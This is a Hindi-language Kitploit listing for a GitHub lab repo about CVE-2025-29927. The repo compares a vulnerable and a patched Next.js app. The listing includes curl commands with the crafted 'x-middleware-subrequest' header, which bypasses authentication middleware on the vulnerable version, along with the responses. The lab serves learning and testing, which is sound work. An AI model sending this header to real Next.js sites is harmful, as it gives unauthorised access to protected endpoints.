Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
nextjs-cve-2025-29927 — vulnerable-nextjs-14-CVE-2025-29927 | Kitploit
उपकरण/GitHubGitHub/yeondg/nextjs-cve-2025-29927
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubyeondg/nextjs-cve-2025-29927

nextjs-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Next.js CVE-2025-29927 मिडलवेयर भेद्यता

यह रिपॉजिटरी एक मोनोरेपो प्रोजेक्ट है जो Next.js 15.2.3 और Next.js 15.1.7 संस्करणों का उपयोग करके CVE-2025-29927 मिडलवेयर भेद्यता की तुलना करता है।

भेद्यता विवरण

CVE-2025-29927 Next.js के मिडलवेयर में पाई गई एक सुरक्षा भेद्यता है, जो x-middleware-subrequest हेडर का उपयोग करके प्रमाणीकरण मिडलवेयर को बायपास करने की अनुमति देती है। यह भेद्यता निम्नलिखित संस्करणों को प्रभावित करती है:

  • Next.js 15.x < 15.2.3
  • Next.js 14.x < 14.2.25
  • Next.js 13.x < 13.5.9 उपरोक्त संस्करणों को उनके संबंधित पैच संस्करणों में अपडेट करके हल किया गया है।

चलाने की विधि

  1. रिपॉजिटरी को क्लोन करें।
  2. निर्भरताएँ स्थापित करें: pnpm install
  3. डेवलपमेंट सर्वर चलाएँ: pnpm dev
  4. प्रत्येक ऐप तक पहुँचें
  • पैच किया गया संस्करण (15.2.3): http://localhost:3000
  • कमजोर संस्करण (15.1.7): http://localhost:3001
  1. बिना टोकन के /api/protected एंडपॉइंट तक पहुँचने पर पहुँच अस्वीकार कर दी जाएगी।
root@kitploit:~
$ curl http://localhost:3000/api/protected
// {"error":"Unauthorized"}

$ curl http://localhost:3001/api/protected
// {"error":"Unauthorized"}
  1. एक मान्य टोकन प्रदान करने पर आप सुरक्षित एंडपॉइंट तक सफलतापूर्वक पहुँच सकते हैं।
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/protected
// {"message":"Hello World"}

$ curl -H "Authorization: my-jwt-token-here" http://localhost:3001/api/protected
// {"message":"Hello World"}
  1. भेद्यता का उपयोग करके मिडलवेयर को बायपास करें।
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/protected
// {"error":"Unauthorized"}

curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3001/api/protected
// {"message":"Hello World"}

प्रोजेक्ट संरचना

root@kitploit:~
nextjs-cve-2025-29927/
├── apps/
│   ├── next15_1_7/  # कमजोर संस्करण
│   └── next15_2_3/  # पैच किया गया संस्करण
├── packages/
│   └── ui/          # साझा UI घटक
└── README.md

संदर्भ लिंक

  • वर्सेल ब्लॉग
  • DevStefanCho यूट्यूब
  • https://hackyboiz.github.io/2025/03/27/bekim/2025-03-27/
  • https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
  • https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
  • https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927
टूल डाउनलोड करें